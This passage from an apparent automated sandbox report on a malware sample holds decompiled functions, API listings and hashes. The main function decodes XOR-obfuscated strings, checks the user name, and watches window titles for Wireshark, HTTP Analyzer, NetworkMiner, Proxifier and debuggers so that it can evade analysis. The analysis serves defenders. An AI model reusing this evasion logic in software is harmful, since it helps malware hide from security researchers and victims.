				_t31 = __ecx;
				_v272 = __ecx;
				_v272 = __ecx;
				_t30 = OpenProcess(0x410, 0, __edx);
				if(_t30 != 0) {
					__imp__K32GetModuleFileNameExA(_t30, 0,  &_v268, 0x104); // executed
					FindCloseChangeNotification(_t30); // executed
				}
				_t23 =  &_v268;
				 *_t31 = 0;
				_t31[4] = 0;
				_t29 = _t23 + 1;
				_t31[5] = 0xf;
				 *_t31 = 0;
				do {
					_t14 =  *_t23;
					_t23 = _t23 + 1;
				} while (_t14 != 0);
				E00402030(_t31,  &_v268);
				return E0040D3AF(_t31, _t21, _v8 ^ _t32, _t29, _t30, _t31, _t23 - _t29);
			}

0x00404c30
0x00404c39
0x00404c40
0x00404c46
0x00404c4a
0x00404c55
0x00404c61
0x00404c65
0x00404c76
0x00404c7d
0x00404c7d
0x00404c83
0x00404c89
0x00404c8f
0x00404c96
0x00404c99
0x00404ca0
0x00404ca3
0x00404ca3
0x00404ca5
0x00404ca6
0x00404cb6
0x00404ccc

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 00404C5B
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00404C76
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00404C7D

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ChangeCloseFileFindModuleNameNotificationOpenProcess
String ID:
API String ID: 4186666201-0
Opcode ID: 2fd9d9d8e39997c28a08ec00c8139ec78a6484881829030f2b0f41f24aa079ea
Instruction ID: 75062410b171a7cb54d792b2959be4822fcd304c745a6a8091bb1bc647e585a9
Opcode Fuzzy Hash: 2fd9d9d8e39997c28a08ec00c8139ec78a6484881829030f2b0f41f24aa079ea
Instruction Fuzzy Hash: 94112B70600604DBE7249F25DC14BFFBBB8DB81704F0042ADE98557280DBB95A8ACFD4

Uniqueness

Uniqueness Score: -1.00%

Function 00418DED Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00418DED(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x43c898 == 0) {
					_push(_t13);
					E00423053(__ebx); // executed
					_t2 = E00423360(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E00418E40(__ebx, _t17);
						if(_t3 != 0) {
							 *0x43c8a4 = _t3;
							_t14 = 0;
							 *0x43c898 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E0041CA88(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E0041CA88(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x00418df4
0x00418dfa
0x00418dfb
0x00418e00
0x00418e05
0x00418e09
0x00418e11
0x00418e19
0x00418e20
0x00418e25
0x00418e27
0x00418e1b
0x00418e1b
0x00418e1b
0x00418e2e
0x00418e0b
0x00418e0b
0x00418e0b
0x00418e35
0x00418e3f
0x00418df6
0x00418df8
0x00418df8

APIs

_free.LIBCMT ref: 00418E35

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0f458c5094a594acc2e368445522de6961a6ef975f3c53590e9ee9392638f120
Instruction ID: 0f686e06fa2c74e231aa04149aad4fa6a075d0cb7cd2f6af039be0e73d0e7a34
Opcode Fuzzy Hash: 0f458c5094a594acc2e368445522de6961a6ef975f3c53590e9ee9392638f120
Instruction Fuzzy Hash: E2E0A032A4161106A216A63ABC423EB2A869F9137BF21022FE414C61D0DE3C49C2526D

Uniqueness

Uniqueness Score: -1.00%

Function 00820E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00820223,?,?), ref: 00820E19
SetErrorMode.KERNELBASE(00000000,?,?,00820223,?,?), ref: 00820E1E

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5e73a5f1b2762c8553ea2a72b061746cf5a5b148c87a8f39b44546495206b7b1
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 5CD0123514512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9081C770998046E5

Uniqueness

Uniqueness Score: -1.00%

Function 00419241 Relevance: 1.6, APIs: 1, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 004192F4

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2915486423170732839c717f9776fac1bb3755ca803699c1171dcf0756046f15
Instruction ID: f0a0121b764f2c957ab0bb218ed79a96348b0e6af4b4587895c913aaf01dea62
Opcode Fuzzy Hash: 2915486423170732839c717f9776fac1bb3755ca803699c1171dcf0756046f15
Instruction Fuzzy Hash: FD318E76A006149F8B14CF9DC4D099EB7F1FF8D32072586A6D925EB3A0C334AC45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00820920 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00820929

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: da867de32a73d219b0bc9e6a28ac5a3a58dd16c851dad49baea75ca192e4b327
Instruction ID: eb0777e9622a16cb38e332e54065874c7edd3c96b1fc6f0c0f8d9bfaef48390b
Opcode Fuzzy Hash: da867de32a73d219b0bc9e6a28ac5a3a58dd16c851dad49baea75ca192e4b327
Instruction Fuzzy Hash: 0D90047034415051DC3035DD0C07F0500411751770F310710F134FF1D5DC44551001FD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00825BAE Relevance: 64.0, APIs: 4, Strings: 32, Instructions: 979threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00404FB0,00000000,00000000,00000000), ref: 00825BC3

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

__Init_thread_footer.LIBCMT ref: 00826171
__Init_thread_footer.LIBCMT ref: 00826333

Strings

h {C, xrefs: 0082604E
h@{C, xrefs: 00826D08
CGVZ, xrefs: 008262C6
M, xrefs: 008270ED
B, xrefs: 00827109
l, xrefs: 00826FC3
RQ(v, xrefs: 00826227
Pk, xrefs: 00826E00
YA, xrefs: 008262D0
pj, xrefs: 00826EE0
'|, xrefs: 00825D29
., xrefs: 008262D9
L\O\, xrefs: 00825EAA
DP, xrefs: 0082706E
]Z\K, xrefs: 00826DA1
Wx, xrefs: 00826143
RQxf, xrefs: 008271D7
%C, xrefs: 008270CD
h${C, xrefs: 00826256
vB, xrefs: 008261EC
2u, xrefs: 0082641E
/}, xrefs: 00825C21
RQme, xrefs: 008272E2
.z, xrefs: 00825F22
h4{C, xrefs: 008262AA
RQHc, xrefs: 00827507
H{, xrefs: 00826164
D{C, xrefs: 00826D2E
CGV., xrefs: 0082612C
h<{C, xrefs: 00826CED
%{, xrefs: 00825E2B
h,{C, xrefs: 00826280

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave$CreateThread
String ID: .$CGV.$CGVZ$D{C$L\O\$RQ(v$RQHc$RQme$RQxf$YA$]Z\K$h {C$h${C$h,{C$h4{C$h<{C$h@{C$%C$%{$'|$.z$/}$2u$DP$H{$Pk$Wx$pj$vB$B$M$l
API String ID: 2619910185-183150312
Opcode ID: b0291830de330132a050e2282fc4960e502f7e021090945cb27456d48b936d8d
Instruction ID: e844a2af35f1d15a8193e178d5762fa9c5fa3602f5e312f95d97b896c98bb1f6
Opcode Fuzzy Hash: b0291830de330132a050e2282fc4960e502f7e021090945cb27456d48b936d8d
Instruction Fuzzy Hash: 84A2F4709003A88BEB24DB28EC89799BB71FF16304F1451E8E449BB292D7755BC4CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404FB0 Relevance: 51.3, APIs: 11, Strings: 18, Instructions: 517
sleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00404FB0(void* __ecx) {
				void* _v8;
				intOrPtr* _v12;
				char _v16;
				signed int _v24;
				char _v228;
				char _v288;
				void* _v292;
				char _v296;
				intOrPtr _v300;
				signed char _v304;
				void* _v308;
				void* _v324;
				signed char _v328;
				void* _v332;
				void* _v348;
				signed char _v352;
				void* _v356;
				void* _v372;
				intOrPtr _v448;
				void* _v456;
				char _v464;
				signed int _v472;
				char _v572;
				void* _v573;
				void* _v576;
				signed char _v580;
				void* _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				void* _v600;
				short _v604;
				signed char _v608;
				void* _v612;
				char _v628;
				signed char _v632;
				void* _v636;
				void* _v652;
				signed char _v656;
				void* _v660;
				char _v676;
				signed char _v680;
				void* _v684;
				void* _v700;
				signed char _v704;
				void* _v708;
				void* _v724;
				signed char _v728;
				void* _v732;
				void* _v748;
				signed char _v752;
				void* _v756;
				void* _v772;
				signed char _v776;
				void* _v780;
				void* _v796;
				char _v820;
				char _v844;
				intOrPtr _v848;
				char _v868;
				char _v892;
				char _v916;
				char _v940;
				char _v1005;
				void* _v1204;
				void* _v1208;
				void* _v1212;
				void* _v1216;
				void* _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				char* _v1256;
				intOrPtr _v1264;
				char _v1268;
				char _v1596;
				char _v1924;
				char _v2252;
				char _v2580;
				signed int _v2584;
				signed char _v2588;
				void* _v2592;
				void* _v2608;
				signed char _v2612;
				signed char _v2616;
				void* _v2620;
				void* _v2636;
				signed char _v2640;
				void* _v2644;
				void* _v2660;
				void* _v2664;
				void* _v2668;
				void* _v2684;
				signed char _v2688;
				void* _v2692;
				char _v2708;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t702;
				signed int _t703;
				intOrPtr _t706;
				signed char _t707;
				signed char _t708;
				CHAR _t713;
				void* _t716;
				intOrPtr _t719;
				signed char _t720;
				signed int _t721;
				CHAR _t726;
				intOrPtr* _t729;
				intOrPtr _t730;
				signed char _t731;
				signed char _t732;
				CHAR _t737;
				intOrPtr* _t740;
				intOrPtr _t743;
				void* _t747;
				void* _t748;
				signed char _t753;
				void* _t754;
				signed int _t757;
				signed int _t758;
				intOrPtr _t764;
				signed char _t765;
				intOrPtr _t767;
				signed char _t768;
				intOrPtr _t770;
				signed char _t771;
				intOrPtr _t773;
				signed char _t774;
				signed int _t779;
				signed char _t781;
				signed char _t782;
				signed char _t785;
				signed char _t787;
				signed char _t788;
				signed char _t791;
				intOrPtr _t792;
				signed char _t793;
				signed char _t794;
				signed char _t797;
				signed char _t803;
				signed char _t806;
				signed char _t807;
				signed char _t810;
				signed char _t811;
				char* _t815;
				void* _t817;
				void* _t820;
				signed char _t824;
				signed char _t825;
				signed char _t828;
				signed char* _t831;
				signed char* _t833;
				void* _t834;
				signed int _t840;
				signed int _t841;
				void* _t847;
				void* _t848;
				signed char _t850;
				void* _t856;
				signed int _t865;
				void* _t867;
				void* _t868;
				signed char _t873;
				void* _t878;
				void* _t883;
				void* _t884;
				signed char _t886;
				void* _t892;
				void* _t897;
				void* _t898;
				signed char _t900;
				signed char _t907;
				signed char _t908;
				void* _t918;
				char* _t923;
				signed char _t927;
				void* _t931;
				void* _t935;
				void* _t936;
				void* _t937;
				void* _t941;
				void* _t946;
				void* _t947;
				signed char _t949;
				void* _t954;
				signed int _t957;
				intOrPtr* _t962;
				signed int _t963;
				signed int _t964;
				intOrPtr _t966;
				void* _t969;
				void* _t973;
				void* _t977;
				intOrPtr _t981;
				void* _t985;
				intOrPtr _t989;
				intOrPtr _t993;
				signed char _t1002;
				void* _t1007;
				signed char _t1015;
				signed char _t1016;
				signed char _t1019;
				signed char _t1020;
				signed char _t1022;
				void* _t1028;
				signed char _t1032;
				void* _t1037;
				signed char _t1041;
				signed char _t1047;
				signed char _t1048;
				signed char _t1051;
				signed char _t1052;
				signed char _t1053;
				void* _t1059;
				signed char _t1063;
				void* _t1068;
				signed char _t1072;
				void* _t1078;
				signed char _t1080;
				signed char _t1081;
				signed char _t1084;
				signed char _t1085;
				void* _t1087;
				signed char _t1091;
				signed char _t1096;
				void* _t1103;
				void* _t1104;
				signed char _t1106;
				signed char _t1107;
				signed char _t1110;
				signed char _t1111;
				void* _t1113;
				signed char _t1117;
				signed char _t1122;
				void* _t1129;
				signed char _t1133;
				void* _t1138;
				void* _t1142;
				signed int _t1146;
				void* _t1151;
				void* _t1158;
				signed int _t1167;
				signed int _t1168;
				signed int _t1172;
				signed int _t1173;
				void* _t1175;
				void* _t1179;
				void* _t1181;
				void* _t1183;
				void* _t1185;
				intOrPtr _t1186;
				void* _t1188;
				void* _t1190;
				intOrPtr _t1193;
				void* _t1197;
				void* _t1200;
				void* _t1204;
				void* _t1213;
				void* _t1217;
				void* _t1226;
				void* _t1230;
				void* _t1241;
				void* _t1242;
				intOrPtr* _t1244;
				intOrPtr _t1245;
				void* _t1247;
				void* _t1248;
				void* _t1249;
				signed char* _t1250;
				CHAR* _t1253;
				signed int* _t1261;
				CHAR* _t1264;
				signed char* _t1268;
				CHAR* _t1271;
				intOrPtr* _t1276;
				void* _t1279;
				intOrPtr* _t1283;
				intOrPtr* _t1286;
				intOrPtr* _t1289;
				intOrPtr* _t1292;
				void* _t1298;
				signed char* _t1299;
				void** _t1301;
				signed char* _t1303;
				void** _t1305;
				signed char* _t1307;
				void** _t1309;
				intOrPtr* _t1311;
				signed char* _t1314;
				intOrPtr* _t1317;
				intOrPtr* _t1329;
				signed char _t1380;
				void* _t1429;
				void* _t1430;
				void* _t1431;
				intOrPtr _t1432;
				void* _t1433;
				intOrPtr _t1434;
				intOrPtr _t1435;
				signed char* _t1436;
				signed char* _t1439;
				signed char _t1440;
				signed char* _t1441;
				signed char* _t1444;
				signed char* _t1448;
				signed char* _t1451;
				signed char* _t1455;
				signed char* _t1458;
				void* _t1460;
				void* _t1463;
				intOrPtr* _t1465;
				void* _t1468;
				void* _t1469;
				signed char* _t1470;
				void* _t1471;
				signed char _t1473;
				signed char _t1474;
				signed int* _t1475;
				void* _t1476;
				signed char _t1478;
				signed char* _t1479;
				void* _t1480;
				signed char _t1482;
				void* _t1483;
				intOrPtr* _t1484;
				void* _t1486;
				char* _t1487;
				void* _t1488;
				void* _t1489;
				void* _t1490;
				void* _t1491;
				signed char _t1493;
				signed char _t1495;
				signed char _t1497;
				signed char _t1499;
				signed char _t1501;
				signed char _t1508;
				signed char _t1509;
				signed char _t1510;
				signed char _t1511;
				void* _t1512;
				signed char _t1513;
				signed char _t1514;
				signed char _t1515;
				void* _t1519;
				signed char _t1527;
				void* _t1539;
				void* _t1540;
				void* _t1541;
				void* _t1542;
				void* _t1543;
				void* _t1544;
				void* _t1545;
				signed char _t1547;
				void* _t1549;
				void* _t1550;
				signed char _t1552;
				void* _t1554;
				void* _t1555;
				signed char _t1559;
				void* _t1560;
				signed char _t1565;
				void* _t1566;
				void* _t1567;
				void* _t1568;
				void* _t1569;
				void* _t1570;
				void* _t1571;
				void* _t1572;
				void* _t1573;
				void* _t1575;
				void* _t1576;
				intOrPtr _t1577;
				intOrPtr* _t1579;
				intOrPtr _t1581;
				intOrPtr _t1585;
				void* _t1586;
				void* _t1587;
				intOrPtr _t1589;
				intOrPtr _t1590;
				void* _t1592;
				void* _t1593;
				signed char _t1595;
				void* _t1600;
				signed int _t1604;
				intOrPtr* _t1606;
				signed int _t1607;
				void* _t1608;
				void* _t1611;
				void* _t1612;
				void* _t1614;
				signed int _t1617;
				void* _t1620;
				void* _t1623;
				void* _t1626;
				void* _t1627;
				void* _t1628;
				void* _t1629;
				void* _t1632;
				void* _t1638;

				_t1249 = __ecx;
				_push(0xffffffff);
				_push(0x42ae81);
				_push( *[fs:0x0]);
				_t1612 = _t1611 - 0x168;
				_t702 =  *0x43b054; // 0x41d6575c
				_t703 = _t702 ^ _t1607;
				_v24 = _t703;
				_push(_t703);
				 *[fs:0x0] =  &_v16;
				_v324 = 0;
				_v308 = 0;
				_v304 = 0xf;
				_v324 = 0;
				_v8 = 0;
				_v296 = 0x47434a4f;
				_v292 = 0x2e40;
				_t1585 =  *((intOrPtr*)( *[fs:0x2c]));
				_t706 =  *0x43ce18; // 0x0
				if(_t706 >  *((intOrPtr*)(_t1585 + 4))) {
					E0040D738(_t706, 0x43ce18);
					_t1612 = _t1612 + 4;
					_t1660 =  *0x43ce18 - 0xffffffff;
					if( *0x43ce18 == 0xffffffff) {
						_t11 =  &_v296; // 0x47434a4f
						 *0x43ce80 =  *_t11;
						 *0x43ce84 = _v292;
						E0040DA4A(_t1249, _t1660, E0042B560);
						E0040D6EE(0x43ce18);
						_t1612 = _t1612 + 8;
					}
				}
				_t707 =  *0x43ce85; // 0x0
				if(_t707 != 0) {
					 *0x43ce80 =  *0x43ce80 ^ 0x0000002e;
					 *0x43ce81 =  *0x43ce81 ^ 0x0000002e;
					 *0x43ce82 =  *0x43ce82 ^ 0x0000002e;
					 *0x43ce83 =  *0x43ce83 ^ 0x0000002e;
					 *0x43ce84 =  *0x43ce84 ^ 0x0000002e;
					 *0x43ce85 = _t707 ^ 0x0000002e;
				}
				_t1250 = 0x43ce80;
				_v348 = 0;
				_v332 = 0;
				_v328 = 0xf;
				_v348 = 0;
				_t17 =  &(_t1250[1]); // 0x43ce81
				_t1470 = _t17;
				goto L6;
				do {
					L8:
					_t713 =  *_t1253;
					_t1253 = _t1253 + 1;
				} while (_t713 != 0);
				_push(_t1253 - _t1471);
				E00402030( &_v372,  &_v288);
				_t1256 =  &_v372;
				_t716 = E0040B260( &_v372,  &_v348);
				_t1473 = _v352;
				_t1241 = _t716;
				if(_t1473 < 0x10) {
					L13:
					_v8 = 0;
					_t1474 = _v328;
					if(_t1474 < 0x10) {
						L17:
						if(_t1241 != 0) {
							L76:
							 *0x43cd10 = 1;
							goto L77;
						} else {
							_t719 =  *0x43ce88; // 0x0
							_v296 = 0x464f467d;
							if(_t719 >  *((intOrPtr*)(_t1585 + 4))) {
								E0040D738(_t719, 0x43ce88);
								_t1612 = _t1612 + 4;
								_t1674 =  *0x43ce88 - 0xffffffff;
								if( *0x43ce88 == 0xffffffff) {
									_t41 =  &_v296; // 0x464f467d
									 *0x43cd54 =  *_t41;
									 *0x43cd58 = 0x2e;
									E0040DA4A(_t1256, _t1674, 0x42b540);
									E0040D6EE(0x43ce88);
									_t1612 = _t1612 + 8;
								}
							}
							_t720 =  *0x43cd58; // 0x0
							if(_t720 != 0) {
								 *0x43cd54 =  *0x43cd54 ^ 0x0000002e;
								 *0x43cd55 =  *0x43cd55 ^ 0x0000002e;
								 *0x43cd56 =  *0x43cd56 ^ 0x0000002e;
								 *0x43cd57 =  *0x43cd57 ^ 0x0000002e;
								 *0x43cd58 = _t720 ^ 0x0000002e;
							}
							_t1261 = 0x43cd54;
							_v348 = 0;
							_v332 = 0;
							_v328 = 0xf;
							_v348 = 0;
							_t46 =  &(_t1261[0]); // 0x43cd55
							_t1475 = _t46;
							goto L24;
							do {
								L26:
								_t726 =  *_t1264;
								_t1264 = _t1264 + 1;
							} while (_t726 != 0);
							_push(_t1264 - _t1476);
							E00402030( &_v372,  &_v288);
							_t1267 =  &_v372;
							_t729 = E0040B260( &_v372,  &_v348);
							_t1478 = _v352;
							_t1244 = _t729;
							if(_t1478 < 0x10) {
								L31:
								_v8 = 0;
								_t1474 = _v328;
								if(_t1474 < 0x10) {
									L35:
									if(_t1244 != 0) {
										goto L76;
									} else {
										_t730 =  *0x43ce74; // 0x0
										_v300 = 0x5a5d4b5a;
										_v296 = 0x4d404b6c;
										_v292 = 0x2e46;
										if(_t730 >  *((intOrPtr*)(_t1585 + 4))) {
											E0040D738(_t730, 0x43ce74);
											_t1612 = _t1612 + 4;
											_t1688 =  *0x43ce74 - 0xffffffff;
											if( *0x43ce74 == 0xffffffff) {
												asm("movq xmm0, [ebp-0x128]");
												asm("movq [0x43ce90], xmm0");
												 *0x43ce98 = _v292;
												E0040DA4A(_t1267, _t1688, 0x42b520);
												E0040D6EE(0x43ce74);
												_t1612 = _t1612 + 8;
											}
										}
										_t731 =  *0x43ce99; // 0x0
										if(_t731 != 0) {
											 *0x43ce90 =  *0x43ce90 ^ 0x0000002e;
											 *0x43ce91 =  *0x43ce91 ^ 0x0000002e;
											 *0x43ce92 =  *0x43ce92 ^ 0x0000002e;
											 *0x43ce93 =  *0x43ce93 ^ 0x0000002e;
											 *0x43ce94 =  *0x43ce94 ^ 0x0000002e;
											 *0x43ce95 =  *0x43ce95 ^ 0x0000002e;
											 *0x43ce96 =  *0x43ce96 ^ 0x0000002e;
											 *0x43ce97 =  *0x43ce97 ^ 0x0000002e;
											 *0x43ce98 =  *0x43ce98 ^ 0x0000002e;
											 *0x43ce99 = _t731 ^ 0x0000002e;
										}
										_t1268 = 0x43ce90;
										_v348 = 0;
										_v332 = 0;
										_v328 = 0xf;
										_v348 = 0;
										_t77 =  &(_t1268[1]); // 0x43ce91
										_t1479 = _t77;
										goto L42;
										do {
											L44:
											_t737 =  *_t1271;
											_t1271 = _t1271 + 1;
										} while (_t737 != 0);
										_push(_t1271 - _t1480);
										E00402030( &_v372,  &_v288);
										_t740 = E0040B260( &_v372,  &_v348);
										_t1482 = _v352;
										_t1244 = _t740;
										if(_t1482 < 0x10) {
											L49:
											_v8 = 0;
											_t1474 = _v328;
											if(_t1474 < 0x10) {
												L53:
												if(_t1244 != 0) {
													goto L76;
												} else {
													GetWindowTextA(GetForegroundWindow(),  &_v288, 0xc8);
													_t1276 =  &_v288;
													_t1483 = _t1276 + 1;
													do {
														_t743 =  *_t1276;
														_t1276 = _t1276 + 1;
													} while (_t743 != 0);
													_push(_t1276 - _t1483);
													E00402030( &_v324,  &_v288);
													_t747 = E0040E9D0( &_v288, " Far ");
													_t1612 = _t1612 + 8;
													if(_t747 == 0) {
														_t1244 = Sleep;
														while(1) {
															_t1179 = E0040E9D0( &_v288, "roxifier");
															_t1612 = _t1612 + 8;
															if(_t1179 != 0) {
																goto L72;
															}
															_t1181 = E0040E9D0( &_v288, "HTTP Analyzer");
															_t1612 = _t1612 + 8;
															if(_t1181 == 0) {
																_t1183 = E0040E9D0( &_v288, "Wireshark");
																_t1612 = _t1612 + 8;
																if(_t1183 == 0) {
																	_t1185 = E0040E9D0( &_v288, "NetworkMiner");
																	_t1612 = _t1612 + 8;
																	if(_t1185 == 0) {
																		_t1606 =  &_v288;
																		_t1463 = _t1606 + 1;
																		do {
																			_t1186 =  *_t1606;
																			_t1606 = _t1606 + 1;
																		} while (_t1186 != 0);
																		_t1585 = _t1606 - _t1463;
																		_t1575 = 0;
																		if(_t1585 > 0) {
																			do {
																				 *((char*)(_t1607 + _t1575 - 0x11c)) = E00416A45( *((char*)(_t1607 + _t1575 - 0x11c)));
																				_t1612 = _t1612 + 4;
																				_t1575 = _t1575 + 1;
																			} while (_t1575 < _t1585);
																		}
																		_t1188 = E0040E9D0( &_v288, "dbg");
																		_t1612 = _t1612 + 8;
																		if(_t1188 == 0) {
																			_t1190 = E0040E9D0( &_v288, "debug");
																			_t1612 = _t1612 + 8;
																			if(_t1190 == 0) {
																				Sleep(0x258);
																				GetWindowTextA(GetForegroundWindow(),  &_v288, 0xc8);
																				_t1465 =  &_v288;
																				_t1570 = _t1465 + 1;
																				do {
																					_t1193 =  *_t1465;
																					_t1465 = _t1465 + 1;
																				} while (_t1193 != 0);
																				_push(_t1465 - _t1570);
																				E00402030( &_v324,  &_v288);
																				_t1197 = E0040E9D0( &_v288, " Far ");
																				_t1612 = _t1612 + 8;
																				if(_t1197 == 0) {
																					continue;
																				}
																			}
																		}
																	}
																}
															}
															goto L72;
														}
													}
													L72:
													_t1474 = _v304;
													 *0x43cd10 = 1;
													if(_t1474 < 0x10) {
														L77:
														 *[fs:0x0] = _v16;
														_pop(_t1576);
														_pop(_t1586);
														_pop(_t1242);
														return E0040D3AF(0, _t1242, _v24 ^ _t1607, _t1474, _t1576, _t1586);
													} else {
														_t1279 = _v324;
														_t1474 = _t1474 + 1;
														_t748 = _t1279;
														if(_t1474 < 0x1000) {
															L75:
															_push(_t1474);
															E0040D5EF(_t1279);
															goto L77;
														} else {
															_t1279 =  *(_t1279 - 4);
															_t1474 = _t1474 + 0x23;
															if(_t748 - _t1279 + 0xfffffffc > 0x1f) {
																goto L78;
															} else {
																goto L75;
															}
														}
													}
												}
											} else {
												_t1468 = _v348;
												_t1474 = _t1474 + 1;
												_t1200 = _t1468;
												if(_t1474 < 0x1000) {
													L52:
													_push(_t1474);
													E0040D5EF(_t1468);
													_t1612 = _t1612 + 8;
													goto L53;
												} else {
													_t1279 =  *(_t1468 - 4);
													_t1474 = _t1474 + 0x23;
													if(_t1200 - _t1279 + 0xfffffffc > 0x1f) {
														goto L78;
													} else {
														goto L52;
													}
												}
											}
										} else {
											_t1469 = _v372;
											_t1571 = _t1482 + 1;
											_t1204 = _t1469;
											if(_t1571 < 0x1000) {
												L48:
												_push(_t1571);
												E0040D5EF(_t1469);
												_t1612 = _t1612 + 8;
												goto L49;
											} else {
												_t1279 =  *(_t1469 - 4);
												_t1474 = _t1571 + 0x23;
												if(_t1204 - _t1279 + 0xfffffffc > 0x1f) {
													goto L78;
												} else {
													goto L48;
												}
											}
										}
										goto L380;
										L42:
										_t732 =  *_t1268;
										_t1268 =  &(_t1268[1]);
										if(_t732 != 0) {
											goto L42;
										} else {
											_push(_t1268 - _t1479);
											E00402030( &_v348, 0x43ce90);
											_t79 =  &_v296; // 0x4d404b6c
											_v8 = 3;
											_v296 = 0x101;
											GetUserNameA( &_v288, _t79);
											_t1271 =  &_v288;
											_v372 = 0;
											_v356 = 0;
											_t1480 = _t1271 + 1;
											_v352 = 0xf;
										}
										goto L44;
									}
								} else {
									_t1267 = _v348;
									_t1474 = _t1474 + 1;
									_t1213 = _t1267;
									if(_t1474 < 0x1000) {
										L34:
										_push(_t1474);
										E0040D5EF(_t1267);
										_t1612 = _t1612 + 8;
										goto L35;
									} else {
										_t1279 =  *(_t1267 - 4);
										_t1474 = _t1474 + 0x23;
										if(_t1213 - _t1279 + 0xfffffffc > 0x1f) {
											goto L78;
										} else {
											goto L34;
										}
									}
								}
							} else {
								_t1267 = _v372;
								_t1572 = _t1478 + 1;
								_t1217 = _t1267;
								if(_t1572 < 0x1000) {
									L30:
									_push(_t1572);
									E0040D5EF(_t1267);
									_t1612 = _t1612 + 8;
									goto L31;
								} else {
									_t1279 =  *(_t1267 - 4);
									_t1474 = _t1572 + 0x23;
									if(_t1217 - _t1279 + 0xfffffffc > 0x1f) {
										goto L78;
									} else {
										goto L30;
									}
								}
							}
							goto L380;
							L24:
							_t721 =  *_t1261;
							_t1261 =  &(_t1261[0]);
							if(_t721 != 0) {
								goto L24;
							} else {
								_push(_t1261 - _t1475);
								E00402030( &_v348, 0x43cd54);
								_t48 =  &_v296; // 0x464f467d
								_v8 = 2;
								_v296 = 0x101;
								GetUserNameA( &_v288, _t48);
								_t1264 =  &_v288;
								_v372 = 0;
								_v356 = 0;
								_t1476 = _t1264 + 1;
								_v352 = 0xf;
							}
							goto L26;
						}
					} else {
						_t1256 = _v348;
						_t1474 = _t1474 + 1;
						_t1226 = _t1256;
						if(_t1474 < 0x1000) {
							L16:
							_push(_t1474);
							E0040D5EF(_t1256);
							_t1612 = _t1612 + 8;
							goto L17;
						} else {
							_t1279 =  *(_t1256 - 4);
							_t1474 = _t1474 + 0x23;
							if(_t1226 - _t1279 + 0xfffffffc > 0x1f) {
								goto L78;
							} else {
								goto L16;
							}
						}
					}
				} else {
					_t1256 = _v372;
					_t1573 = _t1473 + 1;
					_t1230 = _t1256;
					if(_t1573 < 0x1000) {
						L12:
						_push(_t1573);
						E0040D5EF(_t1256);
						_t1612 = _t1612 + 8;
						goto L13;
					} else {
